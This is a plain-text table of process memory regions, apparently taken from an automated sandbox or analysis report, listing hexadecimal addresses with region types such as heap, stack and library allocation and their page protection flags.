||
1CC34E61000
|
heap
|
page read and write
|
||
281ABE2F000
|
heap
|
page read and write
|
||
1DFEFB80000
|
heap
|
page read and write
|
||
1F22529E000
|
trusted library allocation
|
page read and write
|
||
E269EFF000
|
stack
|
page read and write
|
||
21B79519000
|
heap
|
page read and write
|
||
1FCD61A3000
|
heap
|
page read and write
|
||
12A5E394000
|
heap
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
16CEEF6B000
|
heap
|
page read and write
|
||
16CEEF52000
|
heap
|
page read and write
|
||
F20CCFE000
|
stack
|
page read and write
|
||
281AC098000
|
heap
|
page read and write
|
||
7FFD9A794000
|
trusted library allocation
|
page read and write
|
||
1DB92000
|
heap
|
page read and write
|
||
7FFE1A45C000
|
unkown
|
page execute and write copy
|
||
281ACBF5000
|
heap
|
page read and write
|
||
19522CB4000
|
heap
|
page read and write
|
||
FC9000
|
heap
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
281AC9D1000
|
heap
|
page read and write
|
||
26469C30000
|
heap
|
page read and write
|
||
281A9CC6000
|
heap
|
page read and write
|
||
19525FAB000
|
heap
|
page read and write
|
||
21B78F5A000
|
heap
|
page read and write
|
||
1F234EA1000
|
trusted library allocation
|
page read and write
|
||
212531B0000
|
heap
|
page read and write
|
||
1CC34DC0000
|
heap
|
page read and write
|
||
7FFD9A7FC000
|
trusted library allocation
|
page execute and read and write
|
||
174F19A5000
|
heap
|
page read and write
|
||
1B105000
|
heap
|
page read and write
|
||
1F222FE0000
|
heap
|
page read and write
|
||
1B5ED000
|
stack
|
page read and write
|
||
174F1A3A000
|
trusted library allocation
|
page read and write
|
||
1E835A31000
|
heap
|
page read and write
|
||
2462D070000
|
heap
|
page read and write
|
||
26469AA8000
|
heap
|
page read and write
|
||
281ABF64000
|
heap
|
page read and write
|
||
281ABF48000
|
heap
|
page read and write
|
||
14CC0910000
|
heap
|
page read and write
|
||
2224F2E0000
|
trusted library allocation
|
page read and write
|
||
23699F7C000
|
heap
|
page read and write
|
||
1B3D0000
|
heap
|
page execute and read and write
|
||
23BCD01F000
|
heap
|
page read and write
|
||
281ACFCB000
|
heap
|
page read and write
|
||
281AB6D6000
|
heap
|
page read and write
|
||
7FFDFB049000
|
unkown
|
page execute and read and write
|
||
281ABFBF000
|
heap
|
page read and write
|
||
1D3720E0000
|
heap
|
page read and write
|
||
14CC0610000
|
heap
|
page read and write
|
||
281AB64A000
|
heap
|
page read and write
|
||
211E3330000
|
heap
|
page read and write
|
||
2262DA07000
|
heap
|
page read and write
|
||
281ACA20000
|
heap
|
page read and write
|
||
1BEC0000
|
heap
|
page read and write
|
||
1F223105000
|
heap
|
page read and write
|
||
19525F81000
|
heap
|
page read and write
|
||
D306FE000
|
stack
|
page read and write
|
||
23BCD011000
|
heap
|
page read and write
|
||
281AB6BF000
|
heap
|
page read and write
|
||
70E9EFE000
|
stack
|
page read and write
|
||
1DFEFC9D000
|
heap
|
page read and write
|
||
1CC34E59000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
21B78FC3000
|
heap
|
page read and write
|
||
1AFD0000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
2538CA41000
|
heap
|
page read and write
|
||
2BDF000
|
trusted library allocation
|
page read and write
|
||
2646BB24000
|
heap
|
page read and write
|
||
1B950000
|
heap
|
page read and write
|
||
12F1000
|
stack
|
page read and write
|
||
1CA95140000
|
heap
|
page read and write
|
||
21B794F1000
|
heap
|
page read and write
|
||
281AC9C6000
|
heap
|
page read and write
|
||
1C099228000
|
heap
|
page read and write
|
||
21B794FC000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
7FFDFAD86000
|
unkown
|
page execute and read and write
|
||
1C098C42000
|
heap
|
page read and write
|
||
281AB674000
|
heap
|
page read and write
|
||
195247C9000
|
heap
|
page read and write
|
||
19525FC3000
|
heap
|
page read and write
|
||
23F47580000
|
heap
|
page read and write
|
||
1A70000
|
heap
|
page read and write
|
||
7FFE0EC5C000
|
unkown
|
page execute and read and write
|
||
2DDB4EDB000
|
heap
|
page read and write
|
||
26469AE7000
|
heap
|
page read and write
|
||
281AC03E000
|
heap
|
page read and write
|
||
281AC540000
|
direct allocation
|
page read and write
|
||
1B3F6A71000
|
heap
|
page read and write
|
||
1FCD67C7000
|
heap
|
page read and write
|
||
281AB6A1000
|
heap
|
page read and write
|
||
70E9E7F000
|
stack
|
page read and write
|
||
70EA4BE000
|
stack
|
page read and write
|
||
7FF6448AE000
|
unkown
|
page read and write
|
||
281ABA40000
|
heap
|
page read and write
|
||
281AC102000
|
heap
|
page read and write
|
||
1D373AB0000
|
heap
|
page read and write
|
||
174F0EFE000
|
trusted library allocation
|
page read and write
|
||
1C099207000
|
heap
|
page read and write
|
||
1FCD6184000
|
heap
|
page read and write
|
||
160026C0000
|
heap
|
page read and write
|
||
2224EF1F000
|
heap
|
page read and write
|
||
2224F360000
|
trusted library allocation
|
page read and write
|
||
21253210000
|
heap
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
1B0DC000
|
stack
|
page read and write
|
||
25B4F181000
|
heap
|
page read and write
|
||
1DFF3150000
|
direct allocation
|
page read and write
|
||
1418000
|
heap
|
page read and write
|
||
1B4DF000
|
stack
|
page read and write
|
||
21B79509000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
281AC900000
|
direct allocation
|
page read and write
|
||
281ABA20000
|
heap
|
page read and write
|
||
1C09AB82000
|
heap
|
page read and write
|
||
1DFEFC00000
|
heap
|
page read and write
|
||
21B78F52000
|
heap
|
page read and write
|
||
7FFD9A79D000
|
trusted library allocation
|
page execute and read and write
|
||
14CC061B000
|
heap
|
page read and write
|
||
2462D10A000
|
heap
|
page read and write
|
||
16CEEEEA000
|
heap
|
page read and write
|
||
281AC528000
|
direct allocation
|
page read and write
|
||
26469B38000
|
heap
|
page read and write
|
||
22249913000
|
heap
|
page read and write
|
||
281AB64C000
|
heap
|
page read and write
|
||
2074DA90000
|
heap
|
page read and write
|
||
129A8000
|
trusted library allocation
|
page read and write
|
||
2A04CF71000
|
heap
|
page read and write
|
||
281AB6A1000
|
heap
|
page read and write
|
||
B3A9ADB000
|
stack
|
page read and write
|
||
2155A7D8000
|
heap
|
page read and write
|
||
2A75F5E1000
|
heap
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
9AB19FF000
|
unkown
|
page read and write
|
||
27A15FF000
|
unkown
|
page read and write
|
||
7FFD9A8D0000
|
trusted library allocation
|
page execute and read and write
|
||
19525F9F000
|
heap
|
page read and write
|
||
281ACF71000
|
heap
|
page read and write
|
||
B3A9B5F000
|
stack
|
page read and write
|
||
23BCC92A000
|
heap
|
page read and write
|
||
1FCD6080000
|
trusted library allocation
|
page read and write
|
||
38132FF000
|
unkown
|
page read and write
|
||
23BCCB7A000
|
heap
|
page read and write
|
||
131B1000
|
trusted library allocation
|
page read and write
|
||
C107BFF000
|
unkown
|
page read and write
|
||
1FCD61C7000
|
heap
|
page read and write
|
||
281AC09E000
|
heap
|
page read and write
|
||
2462D390000
|
heap
|
page read and write
|
||
7FFE1A45B000
|
unkown
|
page execute and read and write
|
||
281AD1B0000
|
direct allocation
|
page read and write
|
||
12A7000
|
heap
|
page read and write
|
||
E1D58FF000
|
unkown
|
page read and write
|
||
281ACB6D000
|
heap
|
page read and write
|
||
21B79509000
|
heap
|
page read and write
|
||
7FFD9AAC0000
|
trusted library allocation
|
page read and write
|
||
12A5E0D0000
|
heap
|
page read and write
|
||
1DFF3239000
|
direct allocation
|
page read and write
|
||
29E02F60000
|
heap
|
page read and write
|
||
2224EEC3000
|
heap
|
page read and write
|
||
21B78F55000
|
heap
|
page read and write
|
||
7DFC9FF000
|
unkown
|
page read and write
|
||
281AB66C000
|
heap
|
page read and write
|
||
1F235188000
|
trusted library allocation
|
page read and write
|
||
281AC11E000
|
heap
|
page read and write
|
||
21B78EDA000
|
heap
|
page read and write
|
||
84DB2FC000
|
stack
|
page read and write
|
||
281AC08B000
|
heap
|
page read and write
|
||
2224F08E000
|
trusted library allocation
|
page read and write
|
||
7FFD9A992000
|
trusted library allocation
|
page read and write
|
||
F09000
|
heap
|
page read and write
|
||
DB0000
|
heap
|
page read and write
|
||
19525FFD000
|
heap
|
page read and write
|
||
281AB6C0000
|
heap
|
page read and write
|
||
281ABF52000
|
heap
|
page read and write
|
||
2462CF90000
|
heap
|
page read and write
|
||
7FFDFAA12000
|
unkown
|
page execute and read and write
|
||
FF0000
|
heap
|
page read and write
|
||
1F23D3C7000
|
heap
|
page read and write
|
||
12BD3000
|
trusted library allocation
|
page read and write
|
||
38133FF000
|
stack
|
page read and write
|
||
1CA952A0000
|
heap
|
page read and write
|
||
7FF71F119000
|
unkown
|
page write copy
|
||
7FFD9AA90000
|
trusted library allocation
|
page read and write
|
||
19522CF5000
|
heap
|
page read and write
|
||
7FFD9A7D4000
|
trusted library allocation
|
page read and write
|
||
7FF6448B4000
|
unkown
|
page readonly
|
||
1B3CD000
|
stack
|
page read and write
|
||
2464731B000
|
heap
|
page read and write
|
||
24646B01000
|
heap
|
page read and write
|
||
7FFDF8669000
|
unkown
|
page read and write
|
||
15A0000
|
trusted library allocation
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
174F199B000
|
heap
|
page read and write
|
||
6F2BBFF000
|
stack
|
page read and write
|
||
16CEEF60000
|
heap
|
page read and write
|
||
23F8AB10000
|
heap
|
page read and write
|
||
B0FD76F000
|
stack
|
page read and write
|
||
1FCD6147000
|
heap
|
page read and write
|
||
26469AD6000
|
heap
|
page read and write
|
||
25F37815000
|
heap
|
page read and write
|
||
281ABF4C000
|
heap
|
page read and write
|
||
1279000
|
heap
|
page read and write
|
||
7FFD9AAD0000
|
trusted library allocation
|
page read and write
|
||
D10000
|
unkown
|
page readonly
|
||
2462FC11000
|
trusted library allocation
|
page read and write
|
||
EC5F8FE000
|
unkown
|
page read and write
|
||
2538CA41000
|
heap
|
page read and write
|
||
19522D20000
|
heap
|
page read and write
|
||
B0FD6EC000
|
stack
|
page read and write
|
||
281AB9C1000
|
heap
|
page read and write
|
||
281AC07E000
|
heap
|
page read and write
|
||
26469AAF000
|
heap
|
page read and write
|
||
281AB6B2000
|
heap
|
page read and write
|
||
1C098C42000
|
heap
|
page read and write
|
||
2224F0A3000
|
trusted library allocation
|
page read and write
|
||
12A5E0DE000
|
heap
|
page read and write
|
||
1B970000
|
heap
|
page execute and read and write
|
||
174F1920000
|
heap
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
2646A2B2000
|
heap
|
page read and write
|
||
1620000
|
heap
|
page execute and read and write
|
||
FB0000
|
heap
|
page read and write
|
||
211E3334000
|
heap
|
page read and write
|
||
281AC998000
|
heap
|
page read and write
|
||
1BF50000
|
heap
|
page read and write
|
||
16CF0A50000
|
heap
|
page read and write
|
||
281ACB69000
|
heap
|
page read and write
|
||
1DFEFC8E000
|
heap
|
page read and write
|
||
2646A13A000
|
heap
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
2262D9E0000
|
heap
|
page read and write
|
||
BA02FFE000
|
stack
|
page read and write
|
||
23BCC8B0000
|
trusted library allocation
|
page read and write
|
||
29A1000
|
trusted library allocation
|
page read and write
|
||
2B3155C000
|
stack
|
page read and write
|
||
1C098C6D000
|
heap
|
page read and write
|
||
7FFD9A7E4000
|
trusted library allocation
|
page read and write
|
||
23F8AB6B000
|
heap
|
page read and write
|
||
1F235050000
|
trusted library allocation
|
page read and write
|
||
23BCCAD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9A9D0000
|
trusted library allocation
|
page read and write
|
||
281AB9E6000
|
heap
|
page read and write
|
||
1BF4E000
|
stack
|
page read and write
|
||
1FCD8174000
|
heap
|
page read and write
|
||
21B78F5E000
|
heap
|
page read and write
|
||
9DC000
|
stack
|
page read and write
|
||
23699F28000
|
heap
|
page read and write
|
||
1BC40000
|
heap
|
page read and write
|
||
281AC8A0000
|
direct allocation
|
page read and write
|
||
281AC9C4000
|
heap
|
page read and write
|
||
2224EF14000
|
heap
|
page read and write
|
||
7FFE13396000
|
unkown
|
page execute and read and write
|
||
D1990FF000
|
stack
|
page read and write
|
||
1DFEFC85000
|
heap
|
page read and write
|
||
264FC1ED000
|
heap
|
page read and write
|
||
281ACA13000
|
heap
|
page read and write
|
||
19525FBD000
|
heap
|
page read and write
|
||
2224F0A0000
|
trusted library allocation
|
page read and write
|
||
22216340000
|
heap
|
page read and write
|
||
7FFD9AA70000
|
trusted library allocation
|
page read and write
|
||
2224F0E8000
|
trusted library allocation
|
page read and write
|
||
23BCD028000
|
heap
|
page read and write
|
||
281ABA5E000
|
heap
|
page read and write
|
||
7FFD9A7C4000
|
trusted library allocation
|
page read and write
|
||
7FFD9AAF4000
|
trusted library allocation
|
page read and write
|
||
246472C6000
|
heap
|
page read and write
|
||
19525F85000
|
heap
|
page read and write
|
||
281ABA0D000
|
heap
|
page read and write
|
||
16CEEF70000
|
heap
|
page read and write
|
||
264FC1D7000
|
heap
|
page read and write
|
||
16CEEF16000
|
heap
|
page read and write
|
||
20354E90000
|
heap
|
page read and write
|
||
19525FBD000
|
heap
|
page read and write
|
||
1C098C42000
|
heap
|
page read and write
|
||
21253208000
|
heap
|
page read and write
|
||
246474A0000
|
trusted library allocation
|
page read and write
|
||
281ACAB8000
|
heap
|
page read and write
|
||
23BCC939000
|
heap
|
page read and write
|
||
26469AA7000
|
heap
|
page read and write
|
||
2155AA90000
|
heap
|
page read and write
|
||
26469B3D000
|
heap
|
page read and write
|
||
C5C97DF000
|
stack
|
page read and write
|
||
281AB96D000
|
heap
|
page read and write
|
||
20354F2B000
|
heap
|
page read and write
|
||
26469AA5000
|
heap
|
page read and write
|
||
281AB96D000
|
heap
|
page read and write
|
||
21B78FC0000
|
heap
|
page read and write
|
||
21B78FCC000
|
heap
|
page read and write
|
||
281AC09B000
|
heap
|
page read and write
|
||
7FFD9A79D000
|
trusted library allocation
|
page execute and read and write
|
||
2F7FC77000
|
stack
|
page read and write
|
||
65A9E7E000
|
stack
|
page read and write
|
||
EF4CEFF000
|
stack
|
page read and write
|
||
1CE90000
|
trusted library allocation
|
page read and write
|
||
7FFDFA9C2000
|
unkown
|
page execute and read and write
|
||
1E8FFE40000
|
heap
|
page read and write
|
||
174F194A000
|
heap
|
page read and write
|
||
21B794FC000
|
heap
|
page read and write
|
||
281AB6CE000
|
heap
|
page read and write
|
||
C107AFC000
|
stack
|
page read and write
|
||
A7F6FE000
|
stack
|
page read and write
|
||
281ACB37000
|
heap
|
page read and write
|
||
281ABE3B000
|
heap
|
page read and write
|
||
7FFDFA9B2000
|
unkown
|
page execute and read and write
|
||
7FFE13212000
|
unkown
|
page execute and write copy
|
||
6284DFF000
|
stack
|
page read and write
|
||
174F1E80000
|
heap
|
page read and write
|
||
23BCC915000
|
heap
|
page read and write
|
||
47B9EFF000
|
stack
|
page read and write
|
||
12A5E0D0000
|
heap
|
page read and write
|
||
1412F924000
|
heap
|
page read and write
|
||
212531A0000
|
heap
|
page read and write
|
||
281AC960000
|
direct allocation
|
page read and write
|
||
1D37210F000
|
heap
|
page read and write
|
||
2074DAF0000
|
heap
|
page read and write
|
||
227EEE10000
|
heap
|
page read and write
|
||
E70000
|
heap
|
page read and write
|
||
2224EE43000
|
heap
|
page read and write
|
||
281AC4FC000
|
direct allocation
|
page read and write
|
||
15E849B0000
|
heap
|
page read and write
|
||
1C098C4A000
|
heap
|
page read and write
|
||
1CC34DA0000
|
heap
|
page read and write
|
||
1660000
|
heap
|
page read and write
|
||
7FFE148D3000
|
unkown
|
page readonly
|
||
281ABF13000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
281AC998000
|
heap
|
page read and write
|
||
281AB697000
|
heap
|
page read and write
|
||
23F474F0000
|
heap
|
page read and write
|
||
1C098BDA000
|
heap
|
page read and write
|
||
25B4F260000
|
heap
|
page read and write
|
||
25B4F0E5000
|
heap
|
page read and write
|
||
7FFD9AA90000
|
trusted library allocation
|
page read and write
|
||
19525EE0000
|
heap
|
page read and write
|
||
23F8AB81000
|
heap
|
page read and write
|
||
B3A9BDF000
|
stack
|
page read and write
|
||
281AC9FF000
|
heap
|
page read and write
|
||
215476B0000
|
heap
|
page read and write
|
||
2462FDA5000
|
trusted library allocation
|
page read and write
|
||
281AC09A000
|
heap
|
page read and write
|
||
1DFEFCA7000
|
heap
|
page read and write
|
||
26469AB5000
|
heap
|
page read and write
|
||
22249740000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
21B78FDE000
|
heap
|
page read and write
|
||
2224EC70000
|
trusted library allocation
|
page read and write
|
||
281ABF60000
|
heap
|
page read and write
|
||
CA863FF000
|
stack
|
page read and write
|
||
174F0EF3000
|
trusted library allocation
|
page read and write
|
||
7FFD9A7CB000
|
trusted library allocation
|
page execute and read and write
|
||
11F4000
|
heap
|
page read and write
|
||
A7F5FE000
|
stack
|
page read and write
|
||
7375CD4000
|
stack
|
page read and write
|
||
70EA1BE000
|
stack
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
2224EE21000
|
heap
|
page read and write
|
||
EF4CCFB000
|
stack
|
page read and write
|
||
70EA3BE000
|
stack
|
page read and write
|
||
281ABF09000
|
heap
|
page read and write
|
||
281AC8D0000
|
direct allocation
|
page read and write
|
||
281ABF4F000
|
heap
|
page read and write
|
||
24647317000
|
heap
|
page read and write
|
||
2A04CF50000
|
heap
|
page read and write
|
||
281ABEB9000
|
heap
|
page read and write
|
||
16CEF1A4000
|
heap
|
page read and write
|
||
2A75F5C0000
|
heap
|
page read and write
|
||
1E835A10000
|
heap
|
page read and write
|
||
7FFD9A990000
|
trusted library allocation
|
page execute and read and write
|
||
281AB66E000
|
heap
|
page read and write
|
||
23BCCB70000
|
heap
|
page read and write
|
||
2224982B000
|
heap
|
page read and write
|
||
1675000
|
heap
|
page read and write
|
||
281AC8B0000
|
direct allocation
|
page read and write
|
||
2A04CF10000
|
heap
|
page read and write
|
||
160028B0000
|
heap
|
page read and write
|
||
1B954000
|
heap
|
page read and write
|
||
2A04CF71000
|
heap
|
page read and write
|
||
133F000
|
heap
|
page read and write
|
||
24647490000
|
heap
|
page read and write
|
||
281AB604000
|
heap
|
page read and write
|
||
1DA81898000
|
heap
|
page read and write
|
||
82986FF000
|
stack
|
page read and write
|
||
25F379F4000
|
heap
|
page read and write
|
||
1FCD816D000
|
heap
|
page read and write
|
||
23671112000
|
heap
|
page read and write
|
||
281ACD7C000
|
heap
|
page read and write
|
||
281AC118000
|
heap
|
page read and write
|
||
23671109000
|
heap
|
page read and write
|
||
16CF0B0E000
|
heap
|
page read and write
|
||
21B78F60000
|
heap
|
page read and write
|
||
2F7FE7E000
|
stack
|
page read and write
|
||
1F234EB1000
|
trusted library allocation
|
page read and write
|
||
16CEF069000
|
heap
|
page read and write
|
||
3E0000
|
heap
|
page read and write
|
||
21253210000
|
heap
|
page read and write
|
||
22249902000
|
heap
|
page read and write
|
||
222162F0000
|
heap
|
page read and write
|
||
1535000
|
heap
|
page read and write
|
||
13CD000
|
heap
|
page read and write
|
||
16CEEF74000
|
heap
|
page read and write
|
||
2462FC1F000
|
trusted library allocation
|
page read and write
|
||
25BE000
|
stack
|
page read and write
|
||
1F8B2680000
|
heap
|
page read and write
|
||
1DFEFC29000
|
heap
|
page read and write
|
||
281ABF76000
|
heap
|
page read and write
|
||
1308000
|
heap
|
page read and write
|
||
24647130000
|
heap
|
page execute and read and write
|
||
281AB9EC000
|
heap
|
page read and write
|
||
281AB6C8000
|
heap
|
page read and write
|
||
281ABF24000
|
heap
|
page read and write
|
||
BA031FE000
|
stack
|
page read and write
|
||
24647391000
|
heap
|
page read and write
|
||
2538CB60000
|
heap
|
page read and write
|
||
26469B33000
|
heap
|
page read and write
|
||
7FFD9AA60000
|
trusted library allocation
|
page read and write
|
||
281AB665000
|
heap
|
page read and write
|
||
187E000
|
stack
|
page read and write
|
||
25B4F181000
|
heap
|
page read and write
|
||
7FFD9AA40000
|
trusted library allocation
|
page read and write
|
||
16CEEF25000
|
heap
|
page read and write
|
||
281AC0AE000
|
heap
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
1C098B30000
|
trusted library allocation
|
page read and write
|
||
7FFE0EC2F000
|
unkown
|
page execute and read and write
|
||
2646A298000
|
heap
|
page read and write
|
||
281AC9D1000
|
heap
|
page read and write
|
||
7FFDFF23C000
|
unkown
|
page execute and read and write
|
||
7FFDF8668000
|
unkown
|
page execute and write copy
|
||
281AB9CC000
|
heap
|
page read and write
|
||
65A9CFE000
|
stack
|
page read and write
|
||
21B794FC000
|
heap
|
page read and write
|
||
16CEEEEA000
|
heap
|
page read and write
|
||
7FFD9A9A0000
|
trusted library allocation
|
page read and write
|
||
2DFC7E000
|
stack
|
page read and write
|
||
2646A137000
|
heap
|
page read and write
|
||
281ACFC9000
|
heap
|
page read and write
|
||
2646A2AF000
|
heap
|
page read and write
|
||
174F1A36000
|
trusted library allocation
|
page read and write
|
||
2224F0A0000
|
remote allocation
|
page read and write
|
||
1CC34E61000
|
heap
|
page read and write
|
||
1E8FFC60000
|
heap
|
page read and write
|
||
174F1A31000
|
trusted library allocation
|
page read and write
|
||
7FFD9A870000
|
trusted library allocation
|
page execute and read and write
|
||
1C099218000
|
heap
|
page read and write
|
||
133B000
|
heap
|
page read and write
|
||
23BCC938000
|
heap
|
page read and write
|
||
2224F064000
|
trusted library allocation
|
page read and write
|
||
EC5F52C000
|
stack
|
page read and write
|
||
AF1000
|
stack
|
page read and write
|
||
24647270000
|
heap
|
page read and write
|
||
19525F81000
|
heap
|
page read and write
|
||
1B159000
|
heap
|
page read and write
|
||
125B000
|
heap
|
page read and write
|
||
7FFE0EC33000
|
unkown
|
page read and write
|
||
1DFEFC5C000
|
heap
|
page read and write
|
||
29E02EE0000
|
heap
|
page read and write
|
||
281AC04F000
|
heap
|
page read and write
|
||
174F1A63000
|
trusted library allocation
|
page read and write
|
||
2155A690000
|
heap
|
page read and write
|
||
1C94A000
|
stack
|
page read and write
|
||
7FFDFB377000
|
unkown
|
page execute and read and write
|
||
264FC1C5000
|
heap
|
page read and write
|
||
1FCD6199000
|
heap
|
page read and write
|
||
23BCCB1E000
|
heap
|
page read and write
|
||
281AB962000
|
heap
|
page read and write
|
||
7FFE0EBD0000
|
unkown
|
page readonly
|
||
2224F000000
|
trusted library allocation
|
page read and write
|
||
281AB697000
|
heap
|
page read and write
|
||
C88000
|
heap
|
page read and write
|
||
281AC0F1000
|
heap
|
page read and write
|
||
281AC11A000
|
heap
|
page read and write
|
||
10E0000
|
heap
|
page read and write
|
||
281AC123000
|
heap
|
page read and write
|
||
281AC9AB000
|
heap
|
page read and write
|
||
1B15D000
|
stack
|
page read and write
|
||
26469A30000
|
trusted library allocation
|
page read and write
|
||
70EA07E000
|
stack
|
page read and write
|
||
281ABF52000
|
heap
|
page read and write
|
||
281AC101000
|
heap
|
page read and write
|
||
2224ED30000
|
trusted library allocation
|
page read and write
|
||
281AB60B000
|
heap
|
page read and write
|
||
1C09AB84000
|
heap
|
page read and write
|
||
7FFD9A962000
|
trusted library allocation
|
page read and write
|
||
16CEEF76000
|
heap
|
page read and write
|
||
1C098C42000
|
heap
|
page read and write
|
||
281AB665000
|
heap
|
page read and write
|
||
1C2C8000
|
stack
|
page read and write
|
||
21B7ADE0000
|
heap
|
page read and write
|
||
16CEEF23000
|
heap
|
page read and write
|
||
281AC0C6000
|
heap
|
page read and write
|
||
281A9CC0000
|
heap
|
page read and write
|
||
7FFD9A7C3000
|
trusted library allocation
|
page execute and read and write
|
||
16CEEF56000
|
heap
|
page read and write
|
||
281AC10F000
|
heap
|
page read and write
|
||
264FC1CB000
|
heap
|
page read and write
|
||
1136000
|
heap
|
page read and write
|
||
2646A2B0000
|
heap
|
page read and write
|
||
1F22310B000
|
heap
|
page read and write
|
||
1D373B00000
|
heap
|
page read and write
|
||
16CEEF7D000
|
heap
|
page read and write
|
||
26469AA5000
|
heap
|
page read and write
|
||
174F19B3000
|
heap
|
page read and write
|
||
1C539000
|
heap
|
page read and write
|
||
AEC000
|
stack
|
page read and write
|
||
D198DFF000
|
stack
|
page read and write
|
||
281AB6C8000
|
heap
|
page read and write
|
||
281AC0BC000
|
heap
|
page read and write
|
||
7FFD9AA50000
|
trusted library allocation
|
page read and write
|
||
2074DB10000
|
heap
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
19522C80000
|
heap
|
page read and write
|
||
1FCD61B9000
|
heap
|
page read and write
|
||
1F224E42000
|
trusted library allocation
|
page read and write
|
||
281ACBF5000
|
heap
|
page read and write
|
||
1DFF3210000
|
direct allocation
|
page read and write
|
||
1DFEFC9C000
|
heap
|
page read and write
|
||
174F1E84000
|
heap
|
page read and write
|
||
2224EE55000
|
heap
|
page read and write
|
||
23E907C1000
|
heap
|
page read and write
|
||
1490000
|
heap
|
page read and write
|
||
16CEEF74000
|
heap
|
page read and write
|
||
195260E6000
|
heap
|
page read and write
|
||
1DC5D13B000
|
heap
|
page read and write
|
||
4223CFF000
|
unkown
|
page read and write
|
||
2AC0000
|
heap
|
page read and write
|
||
7FFDFAD49000
|
unkown
|
page execute and read and write
|
||
7FFD9A7DD000
|
trusted library allocation
|
page execute and read and write
|
||
281AC10E000
|
heap
|
page read and write
|
||
21B78FB4000
|
heap
|
page read and write
|
||
2224F00E000
|
trusted library allocation
|
page read and write
|
||
1F2231C0000
|
heap
|
page read and write
|
||
1412F741000
|
heap
|
page read and write
|
||
174F1A33000
|
trusted library allocation
|
page read and write
|
||
19526AFA000
|
heap
|
page read and write
|
||
281A9A60000
|
heap
|
page read and write
|
||
1FCD8163000
|
heap
|
page read and write
|
||
16CEEF72000
|
heap
|
page read and write
|
||
21B79509000
|
heap
|
page read and write
|
||
2224EE50000
|
heap
|
page read and write
|
||
21B7ADED000
|
heap
|
page read and write
|
||
19522CBA000
|
heap
|
page read and write
|
||
281AC068000
|
heap
|
page read and write
|
||
23BCC8F8000
|
heap
|
page read and write
|
||
281AC980000
|
direct allocation
|
page read and write
|
||
2D80000
|
heap
|
page read and write
|
||
BA0357D000
|
stack
|
page read and write
|
||
281AC10E000
|
heap
|
page read and write
|
||
174F0EF5000
|
trusted library allocation
|
page read and write
|
||
2A04CF5B000
|
heap
|
page read and write
|
||
1DA81BF4000
|
heap
|
page read and write
|
||
2462EA30000
|
trusted library allocation
|
page read and write
|
||
281AB9C1000
|
heap
|
page read and write
|
||
D01559F000
|
stack
|
page read and write
|
||
7FFD9A7B2000
|
trusted library allocation
|
page read and write
|
||
790000
|
heap
|
page read and write
|
||
19522CBA000
|
heap
|
page read and write
|
||
7FFD9A988000
|
trusted library allocation
|
page read and write
|
||
1C098C07000
|
heap
|
page read and write
|
||
1EC76550000
|
heap
|
page read and write
|
||
174F1B2E000
|
heap
|
page read and write
|
||
281AC53C000
|
direct allocation
|
page read and write
|
||
1FCD61CA000
|
heap
|
page read and write
|
||
7FF644871000
|
unkown
|
page execute read
|
||
17D13C51000
|
heap
|
page read and write
|
||
2224F0C2000
|
trusted library allocation
|
page read and write
|
||
1D6BCF70000
|
heap
|
page read and write
|
||
7FFDFAE9F000
|
unkown
|
page execute and write copy
|
||
281AB6CE000
|
heap
|
page read and write
|
||
281AC9E1000
|
heap
|
page read and write
|
||
281AC9C4000
|
heap
|
page read and write
|
||
21B79512000
|
heap
|
page read and write
|
||
7DFC8FC000
|
stack
|
page read and write
|
||
7FFD9AB50000
|
trusted library allocation
|
page read and write
|
||
7FFD9AAD3000
|
trusted library allocation
|
page read and write
|
||
11FECFF000
|
stack
|
page read and write
|
||
281AC092000
|
heap
|
page read and write
|
||
D01551C000
|
stack
|
page read and write
|
||
B7A775C000
|
stack
|
page read and write
|
||
10F1000
|
stack
|
page read and write
|
||
2F007FE000
|
unkown
|
page readonly
|
||
26469C20000
|
trusted library allocation
|
page read and write
|
||
1D3720F8000
|
heap
|
page read and write
|
||
1F23D3D7000
|
heap
|
page read and write
|
||
19525FE5000
|
heap
|
page read and write
|
||
281AC980000
|
direct allocation
|
page read and write
|
||
281ACEC2000
|
heap
|
page read and write
|
||
12A5E0D2000
|
heap
|
page read and write
|
||
281AB6D9000
|
heap
|
page read and write
|
||
2224F0BA000
|
trusted library allocation
|
page read and write
|
||
281AC9EA000
|
heap
|
page read and write
|
||
7FFD9ABC0000
|
trusted library allocation
|
page read and write
|
||
281AC9DC000
|
heap
|
page read and write
|
||
16CEF079000
|
heap
|
page read and write
|
||
1CA95294000
|
heap
|
page read and write
|
||
1FCD6040000
|
heap
|
page read and write
|
||
281AB93A000
|
heap
|
page read and write
|
||
7FFD9A840000
|
trusted library allocation
|
page read and write
|
||
11F0000
|
trusted library allocation
|
page read and write
|
||
9E05FFF000
|
stack
|
page read and write
|
||
B0EACFF000
|
stack
|
page read and write
|
||
1FCD67D4000
|
heap
|
page read and write
|
||
281ACD7E000
|
heap
|
page read and write
|
||
281ABF52000
|
heap
|
page read and write
|
||
281AB6CE000
|
heap
|
page read and write
|
||
1C829C30000
|
heap
|
page read and write
|
||
21B78FD2000
|
heap
|
page read and write
|
||
281ABA74000
|
heap
|
page read and write
|
||
23F8AA30000
|
heap
|
page read and write
|
||
281ABE4F000
|
heap
|
page read and write
|
||
21B7ADE3000
|
heap
|
page read and write
|
||
174F19A5000
|
heap
|
page read and write
|
||
2A04CF71000
|
heap
|
page read and write
|
||
1BB7F000
|
stack
|
page read and write
|
||
281AC033000
|
heap
|
page read and write
|
||
2646A133000
|
heap
|
page read and write
|
||
